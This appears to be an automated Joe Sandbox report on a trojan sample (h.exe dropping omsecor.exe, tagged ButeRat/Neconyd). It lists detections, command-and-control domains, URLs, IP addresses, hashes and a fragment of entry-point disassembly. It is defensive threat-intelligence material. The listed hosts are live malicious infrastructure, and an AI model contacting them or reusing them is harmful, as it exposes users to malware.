C:\Users\user\AppData\Roaming\omsecor.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Windows\SysWOW64\omsecor.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Roaming\omsecor.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\omsecor.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\omsecor.exe	100%	ReversingLabs	Win32.Trojan.ButeRat
C:\Windows\SysWOW64\omsecor.exe	100%	ReversingLabs	Win32.Trojan.ButeRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
lousta.net	12%	Virustotal	Browse
mkkuei4kdsz.com	12%	Virustotal	Browse
ow5dirasuek.com	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://lousta.net/F.	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/92/650.htmlx;	100%	Avira URL Cloud	malware
http://lousta.net/242/343.html	100%	Avira URL Cloud	malware
http://lousta.net/763/735.htmlr-b	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/	100%	Avira URL Cloud	malware
https://nojs.domaincntrol.com	0%	Avira URL Cloud	safe
https://nojs.domaincntrol.com	0%	Virustotal		Browse
http://mkkuei4kdsz.com/	12%	Virustotal		Browse
http://ow5dirasuek.com/92/650.html	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/S	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/T	100%	Avira URL Cloud	malware
http://lousta.net/650/534.html	100%	Avira URL Cloud	malware
http://lousta.net/	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/S	9%	Virustotal		Browse
http://ow5dirasuek.com/580/608.htmlE	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/569/916.html9	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L	100%	Avira URL Cloud	malware
http://lousta.net/	12%	Virustotal		Browse
http://ow5dirasuek.com/T	7%	Virustotal		Browse
http://lousta.net/650/534.html	8%	Virustotal		Browse
http://lousta.net/763/735.html$	100%	Avira URL Cloud	malware
http://lousta.net/7/91.html	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/92/650.html	10%	Virustotal		Browse
http://ow5dirasuek.com/580/608.html	100%	Avira URL Cloud	malware
http://lousta.net/876/244.html	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/580/608.html7	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/lousta.net	100%	Avira URL Cloud	malware
https://domaincntrol.com/?orighost=	0%	Avira URL Cloud	safe
http://ow5dirasuek.com/580/608.html	9%	Virustotal		Browse
http://lousta.net/763/735.html	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/569/916.html	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/lousta.net	8%	Virustotal		Browse
http://lousta.net/876/244.html	15%	Virustotal		Browse
http://ow5dirasuek.com/92/650.htmlws	100%	Avira URL Cloud	malware
http://lousta.net/7/91.htmla	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	100%	Avira URL Cloud	malware
http://lousta.net/763/735.htmlZ	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/569/916.html	2%	Virustotal		Browse
http://lousta.net/650/534.htmlr	100%	Avira URL Cloud	malware
https://domaincntrol.com/?orighost=	0%	Virustotal		Browse
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	7%	Virustotal		Browse
http://ow5dirasuek.com/580/608.htmlg	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/	100%	Avira URL Cloud	malware
http://lousta.net/0	100%	Avira URL Cloud	malware
http://lousta.net/763/735.html	9%	Virustotal		Browse
http://mkkuei4kdsz.com/470/855.html	100%	Avira URL Cloud	malware
http://lousta.net/763/735.htmlhtml	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM	100%	Avira URL Cloud	malware
http://lousta.net/763/735.html_-O	100%	Avira URL Cloud	malware
http://lousta.net/0	14%	Virustotal		Browse
http://mkkuei4kdsz.com/470/855.html	13%	Virustotal		Browse
http://ow5dirasuek.com/92/650.htmll;	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/580/608.htmlm	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/580/608.htmlk	100%	Avira URL Cloud	malware
http://lousta.net/763/735.htmlH	100%	Avira URL Cloud	malware
http://mkkuei4kdsz.com/569/916.html#	100%	Avira URL Cloud	malware
http://ow5dirasuek.com/	9%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lousta.net	193.166.255.171	true	true	12%, Virustotal, Browse	unknown
mkkuei4kdsz.com	64.225.91.73	true	true	12%, Virustotal, Browse	unknown
ow5dirasuek.com	34.41.229.245	true	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mkkuei4kdsz.com/	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/92/650.html	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://lousta.net/650/534.html	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://lousta.net/	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.html	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/569/916.html	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/470/855.html	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://lousta.net/F.	omsecor.exe, 00000002.00000003.1646596868.000000000083E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://nojs.domaincntrol.com	omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://lousta.net/242/343.html	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/92/650.htmlx;	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/763/735.htmlr-b	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/S	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/T	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.htmlE	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/569/916.html9	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/763/735.html$	omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/7/91.html	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/876/244.html	omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.html7	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/lousta.net	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://domaincntrol.com/?orighost=	omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://lousta.net/763/735.html	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/92/650.htmlws	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/7/91.htmla	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	h.exe, omsecor.exe.0.dr, omsecor.exe.2.dr	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://lousta.net/763/735.htmlZ	omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/650/534.htmlr	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.htmlg	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/0	omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://lousta.net/763/735.htmlhtml	omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/763/735.html_-O	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/92/650.htmll;	omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.htmlm	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ow5dirasuek.com/580/608.htmlk	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lousta.net/763/735.htmlH	omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mkkuei4kdsz.com/569/916.html#	omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
64.225.91.73	mkkuei4kdsz.com	United States	14061	DIGITALOCEAN-ASNUS	true
193.166.255.171	lousta.net	Finland	1741	FUNETASFI	true
34.41.229.245	ow5dirasuek.com	United States	2686	ATGS-MMD-ASUS	true

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379486
Start date and time:	2024-01-23 13:37:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	h.exe
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@5/2@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 116
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:38:34	API Interceptor	8x Sleep call for process: omsecor.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
64.225.91.73	bt.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/514/484.html
	http://cloud-kingl.com	Get hash	malicious	Unknown	Browse	cloud-kingl.com/favicon.ico
	http://cloud-kingl.com	Get hash	malicious	Unknown	Browse	cloud-kingl.com/favicon.ico
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/543/303.html
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/180/41.html
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	qetyhyg.com/login.php
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/920/418.html
	omsecor.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/578/310.html
	vrz9hacoe.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/293/112.html
	992ODFADS.exe	Get hash	malicious	Neconyd	Browse	mkkuei4kdsz.com/897/430.html
193.166.255.171	SecuriteInfo.com.W32.A-7d961ee5.Eldorado.7374.8622.dll	Get hash	malicious	Unknown	Browse	imp.install-zone.com/impression.do/?user_id=A6C92C74-32A2-4D2D-9566-E58C15B28C62&event=setup_cancelled_dll_unitialized&spsource=&browser=CR&implementation_id=dll
	2oivDTuQtl.exe	Get hash	malicious	Unknown	Browse	lousta.net/994/81.html
	eQcKjYOV30.exe	Get hash	malicious	Pushdo	Browse	www.synetik.net/
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	www.synetik.net/
	VuDUlvfL3Q.exe	Get hash	malicious	Unknown	Browse	tra03.t3ded.com:8080/ra03/d.txt
	file.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	www.synetik.net/
	file.exe	Get hash	malicious	Pushdo, SmokeLoader	Browse	www.synetik.net/
	GhjIqAjQKg.exe	Get hash	malicious	Unknown	Browse	tsa13.t12hg.com:8080/sa13/d.txt
	0fmEh2zmDj.exe	Get hash	malicious	Pushdo	Browse	www.synetik.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ow5dirasuek.com	bt.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	omsecor.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	vrz9hacoe.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	992ODFADS.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	AJKXCXCD.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	FJDCSAXE.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
	ASCNXSAX.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
lousta.net	omsecor.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	FJDCSAXE.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	ABNCCDC.exe	Get hash	malicious	Neconyd	Browse	193.166.255.171
	tW5EoSZxTD.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	2oivDTuQtl.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	E4000800.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
	e621.exe	Get hash	malicious	Unknown	Browse	193.166.255.171
mkkuei4kdsz.com	bt.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	ewiuer2.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	omsecor.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	vrz9hacoe.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	992ODFADS.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	AJKXCXCD.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	FJDCSAXE.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73
	ASCNXSAX.exe	Get hash	malicious	Neconyd	Browse	64.225.91.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FUNETASFI	x86.elf	Get hash	malicious	Mirai	Browse	157.24.172.22
	ZgNq4f7FBn.elf	Get hash	malicious	Mirai	Browse	157.24.20.223
	huhu.arm5.elf	Get hash	malicious	Mirai	Browse	130.234.53.110
	CbHvTrpv0C.elf	Get hash	malicious	Mirai, Moobot	Browse	157.24.32.8
	huhu.arm7.elf	Get hash	malicious	Mirai	Browse	157.24.67.207
	skyljne.x86_64.elf	Get hash	malicious	Mirai	Browse	128.214.222.222
	oawyuZdHQO.elf	Get hash	malicious	Mirai	Browse	192.84.228.166
	skyljne.x86.elf	Get hash	malicious	Mirai	Browse	157.24.20.213
	skyljne.x86_64-20240109-1651.elf	Get hash	malicious	Mirai	Browse	157.24.67.220
	tdeICWuzbr.elf	Get hash	malicious	Mirai	Browse	157.24.20.206
DIGITALOCEAN-ASNUS	http://104.131.132.54/dota3.tar.gz	Get hash	malicious	Unknown	Browse	104.131.132.54
	Chepstow Hospital 2024.html	Get hash	malicious	Unknown	Browse	178.128.135.204
	https://blueinsect-raxilaf176408090.codeanyapp.com/STR/SRT34/	Get hash	malicious	Unknown	Browse	45.55.112.74
	BbTm8TrVqb.exe	Get hash	malicious	LummaC, AsyncRAT, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse	162.243.189.2
	SecuriteInfo.com.Python.CrealStealer.4.28055.30099.exe	Get hash	malicious	Creal Stealer	Browse	159.89.102.253
	ghdfg64.exe	Get hash	malicious	Creal Stealer	Browse	159.89.102.253
	java.exe	Get hash	malicious	Tinba	Browse	178.62.201.34
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	134.209.130.144
	python.exe	Get hash	malicious	CobaltStrike	Browse	159.89.124.188
	arm7.elf	Get hash	malicious	Mirai	Browse	157.245.182.60
ATGS-MMD-ASUS	RainViewer-Premium-v3.6.5_build_14453-Moduserupload.in.apk	Get hash	malicious	Unknown	Browse	34.160.223.119
	report.html	Get hash	malicious	Unknown	Browse	34.160.15.205
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.160.144.191
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.160.144.191
	https://resources.hracuity.com/e3t/Ctc/DJ+113/clD6s04/VVrjdY446B4bW4sbZ6y8N-yz0W3S9mTt58tvldN5t-nks3qgyTW7lCdLW6lZ3kvW2P4GsF2t8vK6W5LZC7l60ZQKnVS3zJM5lcSDNW61nRpv24Rtd1W6Rk6Ks1gsjMsW3xYx3d5kSWqsV6s_CQ841sRNW1ZkSQ717TgCsW7NBz_Y5stDqyW8tMtWV7NncJPW3cd7Jz2xRLWqW5s48Qn5fn3FRW8bCMnJ2RN4mgW4BZdCB67szJ8W7v2lk3595CCZW3kRsms8zsJQZW8n6-SF2QNBfyN4DgMrSwQMLcW84XP1Z517CnTV4nsjG65mNN1W4d9BjL4yT33zW7qxJkd94SDlBV2BhwT2hkrdgW7M37Vk72jtl_cDZlW04	Get hash	malicious	Unknown	Browse	34.148.82.226
	https://resources.hracuity.com/e3t/Ctc/DJ+113/clD6s04/VVrjdY446B4bW4sbZ6y8N-yz0W3S9mTt58tvldN5t-nkM3qgyTW7Y8-PT6lZ3mYW2q_qQC7d960XW4r_9Sh62x9qDW6S-3R53kdRxRW1bx4Cv4-v_K_N71VMjpD7BGGVkcQtt6l5dB3W6vjLT76p64x_N6VlNQyMc1ftW1GY7Xj53X05vW1rR2FF7LnrckW2YQZfH7BcCBrW7RPCwB82M0qGW4lWpbk1Hk4t4W7n4wvR3Nr_MyW27zQn33dqcQfN9211v-58wwLW2rK8XL1fP5LPVlRVQ62QYdLcW9dWRWC6mN-LxW4B8CBg7SmYJ5W21tbpW7Q9xLNW1JpsSk3VSQk1W6v9H0S4ZdMqXW98BKbK7gG5bhW3z4dRC3ftVbYN7YCVDk3BwTwf40qsP-04	Get hash	malicious	Unknown	Browse	34.148.82.226
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.149.100.209
	wjdntZ2nr8.elf	Get hash	malicious	Mirai	Browse	32.237.62.92
	qPs4EdUWTu.elf	Get hash	malicious	Mirai	Browse	48.178.146.93
	Chepstow Hospital 2024.html	Get hash	malicious	Unknown	Browse	34.149.20.76

Process:	C:\Users\user\Desktop\h.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83656
Entropy (8bit):	5.504342817449818
Encrypted:	false
SSDEEP:	1536:zd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:zdseIOMEZEyFjEOFqTiQm5l/5
MD5:	77F1965059059CE58EC10CCA09F566D1
SHA1:	C61B9B3AAB3AA507A3EE336461FD2E830D945114
SHA-256:	FD4E86ECBBD5EC2A8CA8DB25FDDF253B554C7AC741A157E55D13BD71804FF1BF
SHA-512:	1AF2AC4B0A003CC314BB002F5E0CA966C8113979230892726C2C1FA7D07A4A379E40F4128E1B865315362EE5B91FD2D3BB59A671E7DFF76BA527BD335DA61E11
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Reputation:	low
Preview:	MZE....S..g.!.M..d-......<ZsO....hv.p.p..Wz...6H].."\|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r....0..`..f..NJ..[..T..............kw..n.v...>..#... ..h.P..0.%...v...oN.Z.,......>.......r......PE..L......P............................F.............@.........................................................................\|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\omsecor.exe

Download File

Process:	C:\Users\user\AppData\Roaming\omsecor.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83656
Entropy (8bit):	5.504323033316674
Encrypted:	false
SSDEEP:	1536:hd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:RdseIOMEZEyFjEOFqTiQm5l/5
MD5:	5A37340FA852E5184BBBA4134E60B591
SHA1:	6A610FA400079B14BD2D3991CE82D350F555D389
SHA-256:	E45A0C0380FB7DBF146E5F1FC94D2D8371DF7435F25D06BC42EC196EA2139336
SHA-512:	D9C30BBDE5F3DEA98C884E1DA4A40ABEA9BBA3BA65B7DD693B086DF9270354CB42BA693CE6B8F46F983D5664BC6D4936904C1863EB1870FE2A2AAD0EB503CF8A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Reputation:	low
Preview:	MZE....S..g.!.M..d-......<ZsO....hv.p.p..Wz...6H].."\|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r....0..`..f..NJ..[..T..............kw..n.v...>..#... ..h.P..0.%...v...oN.Z.,......>.......r......PE..L......P............................F.............@.........................................................................\|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.5043600364153455
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	h.exe
File size:	83'656 bytes
MD5:	564451e54fa0196acd2fd7f771e5ed1c
SHA1:	fd0a26fea635276bc7b54d572f2dbeb7bfd2e1fc
SHA256:	3e4a9ecdc59ebcf0941aa0c37a6704ddfe15eadcc3f16d1023132445736df30f
SHA512:	de484a3801c207fae371db1133cff341d258a3ea531e2f8783944050f10aedf933c5c8a40d0515fb7ec85baad37ddea134495baaa3d6b83eeee36e3cc27d39e7
SSDEEP:	1536:Kd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:KdseIOMEZEyFjEOFqTiQm5l/5
TLSH:	B4838D97B7E6C076E2930AB0267D9591DAFEBD7412E1C2CBC7001C477EA4292C635B87
File Content Preview:	MZE.....S...g.!.M...d-......<ZsO....hv.p.p..Wz.....6H]...."\|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r......0..`..f..NJ....[..T................kw..n.v...>..#... ...h.P..0.%...v....oN.Z.,......>.......r.......PE..L......P...................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40b346
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50B280D5 [Sun Nov 25 20:34:29 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	08b67a9663d3a8c9505f3b2561bbdd1c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, 00001800h
call 00007FC890D29432h
push ebx
push esi
push edi
mov edi, dword ptr [0040E0B0h]
mov esi, 00000400h
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
xor ebx, ebx
push ebx
call edi
push 0040F4FCh
lea eax, dword ptr [ebp-00000800h]
call 00007FC890D212EAh
test eax, eax
pop ecx
je 00007FC890D2722Fh
lea eax, dword ptr [ebp-00001800h]
push eax
call 00007FC890D26A66h
test eax, eax
pop ecx
jne 00007FC890D2721Eh
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
push ebx
call edi
push 00000001h
lea eax, dword ptr [ebp-00000800h]
push eax
push 0040F414h
push 0040F1D8h
push 80000001h
call 00007FC890D22816h
add esp, 14h
test eax, eax
push 00000004h
je 00007FC890D271D7h
push ebx
push 00000003h
jmp 00007FC890D271DBh
call dword ptr [0040E064h]
push eax
push 00000006h
call 00007FC890D26583h
add esp, 0Ch
call 00007FC890D270C3h
call 00007FC890D268EDh
test eax, eax
jne 00007FC890D271C4h
call 00007FC890D26963h
test eax, eax
je 00007FC890D27233h
push 00002710h
call dword ptr [0040E070h]
push 00000004h
push ebx
push 00000009h
call 00007FC890D26554h
add esp, 0Ch
push esi
lea eax, dword ptr [ebp+00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf77c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
